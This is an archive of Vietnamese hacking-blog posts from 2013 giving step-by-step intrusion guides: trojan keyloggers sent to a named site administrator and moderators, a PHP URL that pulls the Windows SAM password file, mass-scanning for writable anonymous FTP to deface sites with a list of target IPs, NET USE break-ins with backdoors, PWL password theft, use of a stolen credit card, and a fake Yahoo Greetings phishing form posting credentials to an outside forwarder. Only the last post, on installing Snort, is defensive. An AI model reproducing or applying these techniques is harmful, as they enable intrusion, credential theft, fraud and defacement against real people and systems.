Thứ Bảy, 31 tháng 8, 2013

on Leave a Comment

Các Bước Của Hacker Khi Muốn Đột Nhập Vào Máy Chủ

 Các bước của hacker khi muốn đột nhập vào một hệ thống máy chủ :
<Bước 1> FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) , Edgar Any Unix client , http://adf.ly/VhFrq , http://adf.ly/VhFux , dig , nslookup Is -d , Sam spade
<Bước 2> Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon .

Thứ Sáu, 30 tháng 8, 2013

on Leave a Comment

FOOTPRINTING

 FOOTPRINTING (In dấu ấn) :
Trước khi 1 hacker bắt đầu làm công việc của anh ta , 3 yếu tố cần thiết phải được làm đầy đủ . FootPrinting là một trong ba yếu tố đó . Chúng ta hãy cùng xem xét về nó . FootPrinting đơn giản chỉ là thu thập , tập hợp thông tin về mục tiêu . Ví dụ như như 1 tên cướp nhà quyết định sẽ cướp nhà băng thì anh ta sẽ không đi dạo quanh nhà băng và đòi hỏi tiền 1 cách khắt khe . Thay vào đó , anh ta sẽ bắt đầu thu thập thông tin về nhà băng : các xe bọc sắt chở tiền và thời gian của xe đi , các camera đặt trong nhà băng , số nhân viên phục vụ , số nhân viên bảo vệ , cửa để thoát thân ... và mọi thứ để giúp anh ta thực hiện hoàn hảo phi vụ này .
Tương tự cũng như đối với attacker hay hacker . Họ phải khai thác 1 kho tàng thông tin vô giá của đối tượng cho việc tấn công . Và kết quả là attacker thu thập được cả đống thông tin , có thể về 1 tổ chức bí mật nào đó .

Thứ Năm, 29 tháng 8, 2013

on Leave a Comment

Lỗ Hổng Bảo Mật


Lỗ hổng bảo mật
    Các lỗ hổng bảo mật trên một hệ thống là các điểm yếu có thể tạo ra sự ngưng trệ của dịch vụ, thêm quyền đối với người sử dụng hoặc cho phép các truy nhập không hợp pháp vào hệ thống. Các lỗ hổng cũng có thể nằm ngay các dịch vụ cung cấp như sendmail, web, ftp ... Ngoài ra các lỗ hổng còn tồn tại ngay chính tại hệ điều hành như trong Windows NT, Windows 95, UNIX; hoặc trong các ứng dụng mà người sử dụng thương xuyên sử dụng như Word processing, Các hệ databases...
Phân loại lỗ hổng bảo mật :
    Có nhiều tổ chức khác nhau tiến hành phân loại các dạng lỗ hổng đặc biêt. Theo cách phân loại của Bộ quốc phòng Mỹ, các loại lỗ hổng bảo mật trên một hệ thống được chia như sau:
- Lỗ hổng loại C: các lỗ hổng loại này cho phép thực hiện các phương thức tấn công theo DoS (Dinal of Services - Từ chối dịch vụ). Mức độ nguy hiểm thấp, chỉ ảnh hưởng tới chất lượng dịch vụ, có thể làm ngưng trệ, gián đoạn hệ thống; không làm phá hỏng dữ liệu hoặc đạt được quyền truy nhập bất hợp pháp
- Lổ hổng loại B: Các lỗ hổng cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần thực hiện kiểm tra tính hợp lệ. Mức độ nguy hiểm trung bình; Những lỗ hổng này thường có trong các ứng dụng trên hệ thống; có thể dẫn đến mất hoặc lộ thông tin yêu cầu bảo mật.
- Lỗ hổng loại A: Các lỗ hổng này cho phép người sử dụng ở ngoài có thể truy nhập vào hệ thống bất hợp pháp. Lỗ hổng rất nguy hiểm, có thể làm phá hủy toàn bộ hệ thống.

Thứ Tư, 28 tháng 8, 2013

on Leave a Comment

Làm sao để hack một trang web

 Đây là các bước một hacker sử dụng để Hack vào một server, kiến thức chỉ thế này thôi, nhưng Hack thành công hay không còn tùy vào người hack.
Làm sao để Hack một trang web :
Đây không còn là chuyện bạn đi kiếm trang web bị dính một lỗi để Hack nữa, bây giờ nó là chuyện khác, khi Hack vào một trang web bạn nhằm vào trước, có thể bạn sẽ tốn 1 giờ, một ngày hay vài tháng, không thể nào nói trước được. Và nên  nhớ Hack là một nghệ thuật, phải biết dùng cái đầu hơn là dùng đôi tay.
1/ Tìm thông tin về trang Web đó :
Đây gọi là bước FootPrinting tức là thu thập thông tin của mục tiêu. Bạn dùng lệnh Whois để tìm thông tin về tên miền đó, nếu là người đàng hoành thì chắc chắn họ sẽ “khai báo” đầy đủ thông tin của mình, Ví dụ khi thử whois thằng http://www.ttvnonline.com/ thì bạn sẽ nhận được gì : Vũ Vương Thắng + đầy đủ thông tin của trang này (mail + địa chỉ nhà …), bạn còn chần chờ gì mà không gửi ngay cho nó một con Trojan keyloger, nhưng dễ hiểu quá, tôi khuyên bạn nên tự viết một con Trojan cho riêng mình, chứ không nên xài đồ có sẵn, như thế Victim sẽ dễ dàng phát hiện được Trojan mà bạn cài và dễ dàng xoá bỏ. Nhưng đôi khi gặp vài trang “Cà chớn” giống như http://www.vnlogic.net/ thì tên khai toàn fuck u không L
2/ Trong khi chờ đợi con keyloger của bạn làm việc, có thể nó gửi thông tin của Vũ Vương Thắng về hay đã bị die, bạn bắt tay vào việc quét server, trong phần trước bạn đã có thông tin về host của trang Web mình cần hack. Đầu tiên là quét cổng, quét xem server nó mở cổng nào, nếu may mắn bạn sẽ phát hiện thằng này đã bị ai hack rồi và một chú trojan đang mở rộng cửa đón bạn vào, nhưng nếu không có cũng chẳng sao cả, bạn sẽ phát hiện được thằng server chạy những cổng nào, từ đ1o phát hiện ra nó đang chạy những service nào. Một số server bạn có thể dùng như sau : http://www.vnn.vn/cgi-bin/test-cgi/*?*  , mỗi dịch vụ của server sẽ bay ra như moi goi J
3/ Mỗi service đều có một vài lỗi riêng và chưa chắc thằng Admin nó fix hết, bạn đã biết server nó chạy những service nào rồi ở bước trên, bạn còn chần chờ gì nữa mà không thử hết lỗi của từng service (exploit, password defaut …), nếu dùng lỗi do chính bạn páht hiện và chưa công bố lên mạng nữa thì càng tuyệt, càng dễ thành công. Vào bước này tôi khuyên bạn không nên dùng chương trình quét lỗi, nó sẽ quét từ những lỗi từ thời Napoleon I đến giờ, và với tốc độ chậm rì ở VN, cái cơ bản dai ra nhu co co và chưa chắc thành công
4/ Sau mỗi lúc nó dùng remote exploit của bạn không thành công, server vẫn là một bức tường thật vững chắc không thể nào vượt qua được, bạn hãy nghĩ ngay đến việc làm sao kiếm cho được một accout trong server đó đã (để dùng local exploit). Bạn bắt đầu tìm hiểu về cơ cấu tổ chức của trang web. Ví dụ khi Hack http://www.ttvnonline.com,/ tôi gửi trojan đến cho Vũ Vương Thắng (Admin của TTVN Online), nhưng đều đã bị phát hiện, tôi nghĩ ngay đến chuyện gửi trojan cho những tên cấp thấp hơn, Ví dụ như trong trang http://www.ttvnonline.com/ , ngoài Vũ Vương Thắng, nó còn giao pass FTP cho một số Moderator nữa, thế là bạn gửi cho tất cả cho Moderatorerator và đợi, trong trường hợp này tỷ lệ thành công dễ hơn nhiều bước 1, vì trong đống Moderator chắc cũng có thằng bất cẩn. Hay Ví dụ khi bạn tấn công server của một côn ty, sau khi gửi trojan cho admin mà không dính, bạn có thể gửi trojan cho tay giám đốc kinh doanh nào đó chẳng hạn, chuyên ngành của nó là kinh doanh và nó sẽ không có nhiều đề phòng, cho dù nó yên tâm là nó đã có cài chương trình antivirus, như khi đã nói trong bài Trojan, chương trình antivirus chức năng chính của nó là chống virus, còn những con trojan bị phát hiện chỉ là những con trojan đã nổi tiếng lắm lắm. Ngoài việc dùng keyloger, bạn cũng có thể tự thử tài đoán password của mình. Thường thì những người không giỏi về vi tính thì đặt password có liên quan đến những thông tin của mình (Ví dụ tên vợ con, tên mình, kênh TV ưa thícch …), bước này cũng khá quan trọng và bạn hãy coi phim “Cá Kiếm“ để học tập sư phụ  . Vẫn không thành công L, nếu thằng đó dùng share host thì việc kiếm được một cái account khoẻ re, dùng ngay cái credit card do bạn chôm được từ trường đăng ký ngay một cái accout, và thằng reseller cha dại mà từ chối tặng bạn account để xài đâu. Có account trong server đó rồi rất tiện, bạn thử dùng Local exploit để đoạt quyền root, thường thì mấy thằng admin không fix Local exploit, nó chỉ quan tâm từ bên ngoài thôi, còn chuyện nội bộ nó không quan tâm lắm. Bây giờ giống như bước 3, thử tất cả các lỗi Local mà bạn biết để thử đoạt quyền root.
5/ Nếu Website mà bạn muốn Hack bị lỗi PHP thì đầu tiên bạn hãy vào Start --> programs --> MS-DOS Prompt và gõ lệnh : Ping www.têntrangweb.com và Enter để biết được IP của Website đó. Sau đó bạn gõ :
http://IP Website/php/php.exe?c:\winnt\repair\sam
Nó sẽ Download file *.SAM về cho bạn. Đó là file chứa Password tuy nhiên đã được mã hoá. Bạn hãy dùng chương trình L0phtCrack (Download trong mục Hack Tools) để giải mã nó
Thế là xong

Thứ Ba, 27 tháng 8, 2013

on Leave a Comment

Huong dan cach tim Website bi loi

 


Hướng dẫn cách tìm Website bị lỗi :
Tôi sẽ hướng dẫn các bạn cách tìm các Website bị lỗi, đa số cách thông dụng nhất là vào các trang Search như http://www.google.com, http://www.av.com ... rồi đánh "powered by ...." (ví dụ : nếu tìm trang Forum UBB 1.0.3 thì đánh "powered by UBB 1.0.3"). Nhưng như thế thường không hiệu quả và nó cho ra rất nhiều trang chẳng liên quan gì đến trang mình cần tìm. Bây giờ tôi chỉ cho các bạn tìm kiếm trang bị lỗi trên http://www.google.com.
Bình thường một chương trình trên mạng đều có một đoạn string đặc biệt trong URL, ví dụ với lỗi Hosting Controller thì sẽ có đoạn "/admin hay /advadmin hay /hosting" hay với forum UBB thì có "cgi-bin/ultimatebb.cgi?", khi chỉ đánh vậy không nó sẽ liệt kê ra cả trang nói về Hosting Controller lẫn trang đang sử dụng Hosting Controller, như thế kết quả ra nhiều nhưng không hiệu quả. Bây giờ các bạn thêm chữ allinurl: trước đoạn string đặc biệt cần kiếm, thì những tran Web tìm kiếm được chắc chắn sẽ có chuỗi cần tìm.
Ví dụ :  Khi tôi kiếm server dùng Hosting Controller, tôi vào http://www.google.com và đánh "allinurl:/advadmin" (không có ngoặc kép) thì nó chỉ liệt kê ra những trang có URL có dạng : http://tentrangweb.com/advadmin.
Nhân tiện tôi cũng chỉ các bạn cách tìm các file trên http://www.google.com
Muốn tìm các file trên http://www.google.com thì bạn thêm chữ type file: trước tên file cần tìm trên các chuyên khu web.
Ví dụ : bạn muốn tìm file mdb (đây là file chứa Password của các Website, dùng Access để mở) thì bạn vào http://www.google.com và đánh type file:mdb
           bạn muốn tìm file SAM (đây là file chứa Password của Windows NT, dùng L0phtCrack để Crack) thì bạn vào http://www.google.com và đánh type file:SAM
--------------------

Thứ Hai, 26 tháng 8, 2013

on Leave a Comment

Làm cách nào để deface 1 trang web

 Hướng dẫn cách deface 1 trang web :
Do có rất nhiều người tò mò rằng làm sao có thể deface được 1 trang web, nên tôi quyết định viết bài này để chỉ cho mọi người 1 cách đơn giản nhất để làm việc đó, và tôi cũng cố gắng viết thật dễ hiểu để 1 người chỉ cần biết sử dụng vi tính cũng có thể làm được.
Như chúng ra đã biết, 1 website được quản lý bằng 1 webserver và 1 ftpserver.Để đưa trang web lên mạng thì chúng ta cần phải dùng ftp để upload file lên, và ftpserver quản lý việc này. FTPserver quản lý account của những người đăng ký host và chỉ những người này mới có quyền upload.Tuy nhiên,ngoài ra 1 số FTPserver có thiết lập thêm mục PUB (public), có nghĩa là cho upload,download nặc danh (anonymous).
Chúng ta bây giờ chỉ quan tâm tới những FTPserver có PUB.
--> Câu hỏi : chúng ta có thể làm gì với 1 FTPserver có PUB ?
Trả lời : 1 PUB thông thường có chứa các file để cho mọi người dowload, 1 số PUB có thể cho upload.Tuy nhiên,1 PUB có thể không chỉ chứa các file dùng cho việc download, mà có thể chứa cả 1 "TRANG WEB". Mọi việc đã rõ,có thể lúc này các
bạn đã mường tượng ra được vấn đề, nếu 1 PUB mà có chứa 1 "TRANG WEB" và PUB đó cho bạn quyền "UPLOAD" thì quả là tuyệt vời. Các bạn đừng nghĩ là việc này không thể có,bởi 1 thực tế là trên mạng vẫn còn rất rất nhiều kiểu PUB dạng như thế này,chính bản thân tôi đã tìm được nhiều PUB như thế và đã thông báo cho các Admin của các Website đó,chẳng hạn http://adf.ly/VWFW2/ .
-----------------------------------------------------------------
***Cách tìm 1 PUB****
- Bước 1 :Tìm FTPserver:
Chúng ta sẽ phải dùng công cụ quét tất cả các IP mở cổng 21 (port 21:cổng mặc định dành cho FTP)
Các bạn có thể dùng bất cứ công cụ quét cổng nào mà bạn muốn,tuy nhiên để tiện thực hiện,tôi xin giới thiệu 1 công cụ quét IP gọi là Proxyhunter,download here : Proxyhunter v3.0 Beta 4 (Bạn có thể tìm bản Proxyhunter mới hơn) .Cách sử dụng:bạn nhập vào 1 IP range,ví dụ như các IP của VN có dạng 203.162.x.x,thì bạn có thể nhập vào 203.162.1.1 --> 203.162.100.225 ; chọn quét cổng 21.
- Bước 2 : Tìm PUB:
Khi đã có 1 list các IP mở cổng 21,chúng ta phải tìm trong list này các IP cho phép truy cập anonymous.
Cũng như trên,các bạn có thể sử dụng bất kỳ tool nào mà mình có để làm viêc này,tuy nhiên tôi xin giới thiệu 1 tool: Net Probe,
download here: Net Probe v1.0.1.1
Cách sử dụng:các bạn import list các IP mở cổng 21 đã lấy được ở trên vào Netprobe,sau đó chỉnh thông số trong View/Option :UserID la anonymous va password la anonymous@ .Sau đó cho Netprobe quét.Sau khi quét xong các bạn sẽ nhìn thấy các IP nào có chữ "New" có nghĩa là IP đó sử dụng được,tức là bạn có thể ftp anonymous vào IP đó.Hãy export các IP đó ra 1 file anonymous.txt
- Bước 3 : các bạn bắt buộc phải thử từng IP trong file anonymous.txt .
ftp vào các IP đó với Username:anonymous,Password:anonymous@,và kiểm tra xem nó có chứa "TRANG WEB" và cho phép "UPLOAD" hay không.Bước 3 là bước mất thời gian nhất,tuy nhiên như chúng ta đã biết không có gì là quá dễ dàng,cần phải có sự kiên nhẫn,có khi chúng ta lại có được hơn những gì chúng ta mong đợi,điều đó đã đúng với tôi.
-Bước 4:Các bạn tự biết mình cần làm gì với 1 PUB có "TRANG WEB" và được quyền "UPLOAD" như vậy.
--------------------------------------------------
**Mánh khóe:***
1. Hãy trở lại bước 2,không nhất thiết là phải dùng anonymous đối với UserID va Password,các bạn có thể đoán UserID và Password khác tùy thuộc vào thông tin mà bạn biết,hoặc sử dụng các account ftp được thiết lập default chẳng hạn các cặp UserID-Password co the la admin-passsword,administrator-admin,admin-admin,...tùy thuộc vào loại ftpserver.Nếu các bạn thành công trong việc này thì bạn có thể gặt hái được nhiều cái hay hơn.
2. Có những công cụ có thể làm luôn 2 bước (bước 1 và bước 2) 1 lúc,ví dụ FTP scanner,download here :ftp://source:source@203.45.224.73/scanners/FTP%20Scanner.zip
3. Có những PUB không cho phép UPLOAD nhưng lại được download,và nó có những dữ liệu quan trọng,chúng ta hãy download về máy mình và hãy nghiên cứu,chúng ta có thể tìm ra những con đường khác để làm cái mình muốn.
---------------------------------------
Sau đây là 1 số PUB IP tôi đã scan từ lâu,nó có nhiều thông tin hay,1 số có trang web và các bạn có thể deface,có thể có 1 số không còn sử dụng được (bởi mấy cái này tôi lấy cách đây đã 2 tháng,và tôi cũng ngại kiểm tra lại,nếu không còn dùng được thì các bạn cũng đừng la ó),tuy nhiên tôi cũng muốn post lên cho các bạn tham khảo,còn công việc của các bạn là hãy tự kiếm các PUB khác cho mình,tự mình làm được bao giờ cũng có cảm giác hay hơn.
211.100.18.163
211.100.6.149
211.100.7.55
211.100.17.161
211.100.17.214
211.100.8.148
211.100.10.18
211.100.102.35
203.162.42.146
203.162.45.130
203.162.56.212
211.101.4.82
211.101.4.200
211.101.144.70
211.101.160.230
211.101.169.171
211.101.170.136
211.101.173.134
211.101.174.5
211.101.175.196
211.101.185.132
211.101.186.98
193.130.32.66
193.130.62.12
202.108.109.94
211.235.235.253
211.235.247.15
211.235.249.102
211.235.249.221
211.235.253.43
211.230.126.180
211.230.143.107
211.230.125.26 -->cái này chính là trang http://adf.ly/VWFbL mà tôi đã mở hàng cho mục này,nó vẫn chưa patch.

Chủ Nhật, 25 tháng 8, 2013

on Leave a Comment

Tu trang bi cong cu cho minh

 


Tự trang bị công cụ cho mìnnh :
-Trước tiên bạn cần 1 shell account, cái này thực sự quan trọng đối với bạn.1 shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC (rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS shell.Bạn có thể kiếm shell account ở đâu ? Thông thường khi bạn cài *nix thì bạn sẽ có 1 shell account, nếu bạn không cài *nix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài *nix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start --> Run --> gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
....
Các bạn có thể tự tìm thêm và chọn cho mình 1 shell account ưng ý.

-NMAP : Công cụ quét cực nhanh,mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services/ports:webserver,ftpserver,pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol,Null scan,TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/
Download : Nmap 2.54 Beta 30 for Windows
NmapNT - A Win32 port of nmap v 2.53
Stealth HTTP Security Scanner : Công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
Download : Stealth HTTP Security Scanner v2.0 Build 36
IntelliTamper : Công cụ hiển thị cấu trúc của 1 Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục, file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack 1 Website thì bạn phải nắm 1 số thông tin của Admin và Website đó.
Download : IntelliTamper v2.07

-Netcat : Công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình, script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu (tất nhiên là khi Netcat đã được cài trên 1 server bị lỗi). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/
Download : Netcat 1.10 for Unix
Netcat 1.10 for WinNT
Netcat* (+ twofish encryption)
Netcat 1.10 for NT* (+ twofish encryption)
Active Perl : Công cụ đọc các file Perl  đuôi *.pl vì các exploit thường được viết bằng Perl .
Download : Active Perl
L0phtCrack : Công cụ số một để Crack Password của Windows NT/2000 .
Download : L0phtCrack 3.0
L0phtCrack 4.0

-Linux : Hệ điều hành hầu hết các hacker đều sử dụng.

-Cuối cùng là thông tin về vulnerabilities và các exploits (thường được viết bằng C,perl) được cập nhật thường xuyên trên các Website sau :
Bugtraq
Xploits
Tlsecurity
Ossr.phpwebhosting
Securityfocus
Htsecurity
MegaSecurity
EyeonSecurity
Hy vọng bài viết này giúp bạn tự trang bị cho mình những công cụ cần thiết để có thể tấn công bất kỳ server nào.

Thứ Bảy, 24 tháng 8, 2013

on Leave a Comment

Su Dung Legion

 

XÂM NHẬP MÁY TÍNH QUA MẠNG

Thong thuong mot hacker truoc khi xam nhap may tinh, thuong co gang cai mot trojan mo cong de xam nhap, noi tieng nhat la Trojan Back office. 
Cong cu can thiet: 
Dau tien ban can la mot truong trinhsacn goi la Netbios scaner, Legion hay Winhackgold. Chuong trinh se scan tat ca cac may co chia se file tren cung mot netbios. 
Tuy nhien cach nay chi su dung voi nhung may chay Windows 9x va su dung File and Sharing . . .
Nhung chuong trinh nay co san tai Web Site: http://kickme.to/tuanvinh
Bat dau: 
Sau khi ket noi vao mang, ban vao Star/run roi danh winipcfg, ban se nhan duoc mo dia chi IP ma ISP gan cho ban moi khi ban ket noi, neu ban ket noi bang modem thi so IP nay se thay doi goi la IP dong. 
Trong muc SCAN FROM cua legion ban hay danh dia chi IP cua minh vao. Vi du minh co: 202.150.12.19 thi toi danh trong legion la 202.150.12 thoi. Bay gio mo muc TO cua Legion ban danh 202.150.xx (xx la dia chi IP bat ki ban danh vao). 
Bay gio an nut SCAN, Legion se bat dau scan va cho tat ca cac ia chi IP no tim thay 1-254. Neu ban may man thi khi cho IP ban se nhin thay sau: 
Share resources at\\202.11.11.42
Sharename Type Comment
A Disk Floppy
CDRIVE Disk C:\Drive
DDRIVE Disk D:\Drive
CDROM Disk CD-Rom Read only
The command was completed successfully 
Hay kick vao dic chi IP doo voi lenh cua USE Net ban se co quyen kiem soat dia chi IP do. 
Trong cua so Dos-Promt ban hay su dung cac lenh sau: 
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO] 
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO] 
NET USE drive: / */HOME 
drive Specifies the drive letter you assign to a shared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to disconnect all of your connections. Port Specifies the parallel (LPT) port name you assign to a shared printer. Vomputer Specifies the name of the computer sharing the resource.
Directory Specifies the name of the shared directory. Printer Specifies the name of the shared printer.
Password Specifies the password for the shared resource, if any.
? Specifies that you want to be prompted for the password of the shared resource. You don't need to use this option unless the password is optional.
/SAVEPW:NO Specifies that the password you type should not be saved in your password-list file. You need to retype the password the next time you connect to this resource.
/YES Carries out the NET USE command without first prompting you to provide information or confirm actions.
/DELETE Breaks the specified connection to a shared resource.
/NO Carries out the NET USE command, responding with NO automatically when you are prompted to confirm actions.
/HOME Makes a connection to your HOME directory if one is specified in your LAN Manager or Windows NT user account. 
To list all of your connections, type NET USE without option. 
To see this information one screen at a time, type the following at the command prompt: 
NET USE /? \MORE
Or
NET HELP USE \MORE 
Sau khi xam nhap vao may nay xong.
Ban nen mo 1 Port va cai san 1 BackDoor.
Lan sau ban co the vao thang may do va nam quyen toi cao.
Tuy nhien theo toi dung nen lam dung qua nhieu dong lenh.
Dieu do lam cham dong du lieu den may tinh do.
Chu nhan cua no se co the phat hien ra su co mat cua ban.
Va ho chi can tat may la ban het cach.
HAY CAN THAN!
Chung ban thanh cong!

Thứ Sáu, 23 tháng 8, 2013

on Leave a Comment

Xam nhap vao may tinh cua Victim

 

Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools :
- Đầu tiên các bạn phải Download chương trình Essential NetTools :
Essential Net Tools 3.0Crack của nó
Rồi thực hiện các bước sau :
+ Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như :
Winzip, Winrar...
Download tại : http://www.winzip.com/
Bước 1 : Thiết lập cấu hình
- Bạn vào trong Control Panel rồi vào Network
- Click vào nút Add  rồi chọn phần Client
- Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft
- Chọn phần Client for Microsoft Network
- Cuối cùng là OK
Bước 2 : Bắt đầu xâm nhập
+ Ngay phần NBscan
ngay phần" Starting IP":
Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start --> Run rồi gõ : "winipcfg"
VD :
203.162.11.1
hoặc :
202.167.122.1
Còn phần Ending Ip :
203.162.11.255
hoặc :
202.167.122.225
+ Sau đó click chuột vào nút Start
+ Chờ sau giây lát !
Nó sẽ xuất hiện danh sách IP sau khi dò tìm !
+Ngay phần RS:
No : là không có xâm nhập vào được
Yes: là xâm nhập được (nhưng đôi khi thì không)
+ Nhấp chuột phải vào hàng mà có chữ "Yes"
- Nhấp vào phần "Open Computer"
+ Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được !
Nhưng đột nhập để làm gì ?
Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim !
Ắn cắp Password bằng cách lấy files PWL của victim trong :
C:/window/*.PWL
Rồi dùng công cụ PWL Tool để đọc được file đó

Thứ Năm, 22 tháng 8, 2013

on Leave a Comment

Hack Pass cap cao nhat cua hacker

 

Hack Password cấp cao nhất của hacker :

Xin giới thiệu anh em 1 cách hack password cấp độ thuộc
hàng 5 sao đấy
Chiêu này để lấy pass của các co thử nhưng không đề phòng
Một số bạn bảo là làm sao dụ victim vào web qua trang của chúng ta
nhưng các cao thủ hoặc menber chỉ vô hòm thư qua trang www.mail.yahoo.com thôi
Vì vậy để hack được cần phải đưa vào tính tò mò của con người như
send quà tặng
Nói chung là có 2 cách
Cách 1 :
Send victim 1 cai greetings có dạng như greetings that
Nhưng địa chỉ để xem qua lại là 1 cái relogin có chứa đoạn ăn cắp pass
của mình
Giả sử victim mà tôi cần chôm pass có địa chỉ là anhvinhynwa@yahoo.com
thì tôi sẽ send 1 cái greetings đến như sau cái này là của tôi đem ra làm ví dụ
thôi
Lehuong311 chíh là tôi để lừa pass
Chào anh em muốn làm qun và học về Hack, thấy cái tên
hautuoc_buon hay hay nên toi thử gửi thư cho anh xem, nhớ mail lại cho
tôi nhé
Surprise! You've just received a Yahoo! Greeting
from "Huong" (lehuong311@yahoo.com)!
To view this greeting card, click on the following
Web address at anytime within the next 30 days.
Please view it in TK image and greetings
http://VIEWYOURGREEINGSWITHCODEISHTBFNR54TB.TK
or
http://viewyourgreetingswithcode=ISHTBFNR54TB.dk3.com
If that doesn't work, go to http://view.greetings.yahoo.com/pickup and
copy and paste this code:
ISHTBFNR54TB
Enjoy!
TK group is a division of yahoo company
The Yahoo! Greetings Team
-------------------------
Yahoo! Greetings is a free service. If you'd like to send someone a
Yahoo! Greeting, you can do so at http://greetings.yahoo.com/
New! SBC Yahoo! Dial... 1st Month Free & unlimited access.
http://pa.yahoo.com/*http://rd.yahoo.com/sbcyahoo/consumer/greettag/evt=639/*http://sbc.yahoo.com
Để làm được như vậy các bạn cần làm như sau :
1 - Đăng lập 1 hòm thư có dạng yourgreetings hoặc mygreetings
(Cái này để lừa victim vì victim tưởng đây là quà)
2-Vào hòm thư sau đó vô option-->Account information--change password
Bạn sẽ được thấy 1 trang trong đó có ghi sẵn ID của bạn và có dòng
verify password
to continue
Hãy ghi trang này lại sau đó dùng 1 công cụ edit như notepad để sửa cái tên ID của bạn thành của  victim (dùng lệnh find mà làm) và sửa đoạn verify password to continue thành verify password to continue view
this greetings
vd: http://viewyourgreeingswithcodeishtbfnr54tb.tk/
- Cái này làm ra với mục đích để lừa victim đánh pass vào để xem quà tặng
- Sau đó bạn chèn thêm 2 dòng sau
- dòng 1 :
<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />
(tham khảo bài ăn cắp pass qua webserver trung gian dễ hiểu)

1 dòng có dạng :
<form action="http://view.greetings.yahoo.com/greet/view?2BAFQBTZGKHW8XX"
Tức là để lừa victim đến 2 trang
1- trang brave
2-trang có quà tặng (để victim không nghi ngờ)
Sau đó upload lên geoticities là ok
Chọn host thì bạn cần đánh vài cái tên có vẻ giống quà tặng như
vd của tôi là :
http://viewyourgreetingswithcode=ht45mn.dk3.com
hay
http://VIEWYOURGREEINGSWITHCODEISHTBFNR54TB.TK
Sau khi đã upload xong bạn chỉ cần làm 1 hộp thư mới với tên con gái như của tôi là lehuong311 để lừa các cao thủ nhưng mê gái
Cách 2 : Dụ victim chỉ vào cái quá nó sẽ ra ô relogin = cách tạo ra 1 lỗi fakelogin

Bài viết của sirhoangducthedarktemplar


Thứ Tư, 21 tháng 8, 2013

on Leave a Comment

vnSecurity - Cài đặt nhanh hệ thống phát hiện xâm nhập dùng Snort+ACID

 

Cài đặt nhanh hệ thống phát hiện xâm nhập dùng Snort+ACID :

Hướng dẫn cài đặt nhanh hệ thống phát hiện xâm nhập (IDS) trên Linux/Unix sử dụng Snort với cơ sở dữ liệu mysql để lưu log, alert và ACID làm giao diện theo dõi.
* Yêu cầu hệ thống:
- mysql-3.23+ http://www.mysql.org/
- apache-1.3+ http://httpd.apache.org/
- php-4.04+ http://www.php.net/
- snort-1.8.3+ http://www.snort.org/
- acid-0.9.6+ http://www.andrew.cmu.edu/~rdanyliw/snort/snortacid.html
- adodb-1.2+ http://php.weblogs.com/adodb
- phplot-4.4.6+ http://phplot.sourceforge.net/ (tuỳ chọn để xem các thống kê dạng biểu đồ đưọc vẽ bằng thư viện gd, yêu cầu php phải được biên dịch hỗ trợ gd)
* Giả thiết:
- Hệ thống đã được cài đặt mysql, apache, php và hoạt động tốt (ví dụ RH 7.2).
- Địa chỉ mạng cục bộ cần theo dõi: 192.168.1.0/24
* Cài đặt snort và cấu hình snort.
Download mã nguồn:
http://www.snort.org/dl/snort-1.8.6.tar.gz
# tar zxvf snort-1.8.6.tar.gz
# cd snort-1.8.6
# ./configure --with-mysql=/usr
# make
# make install
# mkdir /etc/snort
# cp *.rules classification.config snort.conf /etc/snort/
Tạo bảng dữ liệu để lưu trữ snort log, alert:
# mysql -u root -p
mysql> create database snort;
